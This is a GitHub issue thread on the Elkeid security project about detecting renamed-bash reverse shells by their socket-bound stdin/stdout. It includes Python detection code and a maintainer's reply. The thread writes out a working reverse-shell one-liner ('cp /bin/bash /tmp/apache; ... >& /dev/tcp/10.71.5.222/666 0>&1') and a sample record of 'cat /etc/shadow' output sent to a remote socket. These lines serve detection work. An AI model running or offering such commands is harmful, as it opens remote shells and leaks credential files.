
Check stdin/stdout redirection for all programs, so the rule cannot be bypassed #5

Closed
wcc526 opened this issue Jan 19, 2022 · 1 comment

Comments

@wcc526

wcc526 commented Jan 19, 2022

Could you please evaluate this rule change:

#4

cp /bin/bash /tmp/apache;/tmp/apache -i >& /dev/tcp/10.71.5.222/666 0>&1

{
"bootTime":"2022-01-19 18:48:20.000",
"cmdline":"/tmp/apache -i",
"cwd":"/",
"exe":"/tmp/apache",
"fd_num":"3",
"name":"apache",
"pid":"88184",
"ppid":"50250",
"r_addr_ip":"10.71.5.222",
"r_addr_port":"666",
"session":"50250",
"stderr":"socket:[583190616]",
"stdin":"socket:[583190616]",
"stdout":"socket:[583190616]",
"terminal":"/pts/0",
"username":"root"
},
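The record above shows why a reverse-shell rule keyed on the executable name is easy to defeat: the binary is a copy of bash named apache, but its three standard descriptors all point at the same socket, and the remote address is recorded alongside them. The following is an added example, not Elkeid's agent code or any rule from its rule set; it shows the check the issue asks for, applied to a few constructed process records modelled on the one above (the field names follow that record; the second to fourth records and their values are invented for illustration). The logic looks only at where stdin, stdout and stderr point, never at exe or name, and rates stdin and stdout sharing one socket inode higher than a single descriptor on a socket.

```python
import json
import re

# Link targets under /proc/<pid>/fd look like "socket:[583190616]" for sockets.
SOCKET_FD = re.compile(r"^socket:\[(\d+)\]$")
STD_FDS = ("stdin", "stdout", "stderr")

# Constructed sample events (one JSON record per line). The first is shaped
# after the record in the issue; the other three are invented: an interactive
# bash on a pty, a web server worker with no socket on its std fds, and a
# process that only sends stdout to a socket (exfiltration, not a shell).
SAMPLE_EVENTS = """
{"cmdline":"/tmp/apache -i","exe":"/tmp/apache","name":"apache","pid":"88184","ppid":"50250","r_addr_ip":"10.71.5.222","r_addr_port":"666","stderr":"socket:[583190616]","stdin":"socket:[583190616]","stdout":"socket:[583190616]","terminal":"/pts/0","username":"root"}
{"cmdline":"bash","exe":"/usr/bin/bash","name":"bash","pid":"50250","ppid":"50249","r_addr_ip":"","r_addr_port":"","stderr":"/dev/pts/0","stdin":"/dev/pts/0","stdout":"/dev/pts/0","terminal":"/pts/0","username":"root"}
{"cmdline":"nginx: worker process","exe":"/usr/sbin/nginx","name":"nginx","pid":"1200","ppid":"1199","r_addr_ip":"","r_addr_port":"","stderr":"/var/log/nginx/error.log","stdin":"/dev/null","stdout":"/dev/null","terminal":"","username":"www-data"}
{"cmdline":"cat /etc/shadow","exe":"/usr/bin/cat","name":"cat","pid":"7000","ppid":"6999","r_addr_ip":"198.51.100.7","r_addr_port":"4444","stderr":"/dev/pts/1","stdin":"/dev/pts/1","stdout":"socket:[123]","terminal":"/pts/1","username":"nobody"}
"""


def socket_inode(fd_target):
    """Return the socket inode from an fd link target, or None if not a socket."""
    m = SOCKET_FD.match(fd_target or "")
    return m.group(1) if m else None


def classify(event):
    """
    Decide whether a process record looks like a shell talking over a socket.

    Only the std descriptors are examined, never exe/name, so renaming the
    shell binary ('cp /bin/bash /tmp/apache') does not evade the check.
    Returns None for clean records, otherwise a dict describing the alert.
    """
    inodes = {fd: socket_inode(event.get(fd)) for fd in STD_FDS}
    socket_fds = [fd for fd in STD_FDS if inodes[fd]]
    if not socket_fds:
        return None
    alert = {
        "pid": event.get("pid"),
        "exe": event.get("exe"),
        "socket_fds": socket_fds,
        "remote": "%s:%s" % (event.get("r_addr_ip", ""), event.get("r_addr_port", "")),
    }
    # stdin and stdout on the same socket means one connection carries both
    # commands in and output out: exactly the shape of '>& /dev/tcp/... 0>&1'.
    if inodes["stdin"] and inodes["stdin"] == inodes["stdout"]:
        alert["level"] = "reverse_shell"
    else:
        alert["level"] = "socket_io"
    return alert


def scan(records):
    """Run classify() over newline-separated JSON records; return the alerts."""
    alerts = []
    for line in records.strip().splitlines():
        verdict = classify(json.loads(line))
        if verdict:
            alerts.append(verdict)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(a)
```

One caveat a rule author would want: programs started by inetd-style supervisors (systemd socket units with Accept=yes, for instance) legitimately receive a connected socket as stdin and stdout, so a production rule should carry an allowlist keyed on the parent or unit, or combine this descriptor check with the r_addr fields and the parent process chain rather than alerting on the descriptors alone.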

@whitelez

whitelez commented Jan 20, 2022

Hi,
This is a very good point; bypasses of this kind need to be detected as part of the rule set.
In fact that is what we do, and the currently open-sourced rule set is only a small part of our commercial version.
We suggest you add it yourself, using the binary_file_hijack_detect series in the open-source rules as a reference for modifying the detection of this kind of file replacement.
If you reach a good result, please submit a merge request and we will help test it and merge it.

Thank you for your interest.
Elkeid Team

@EBWi11 EBWi11 closed this as completed Mar 8, 2022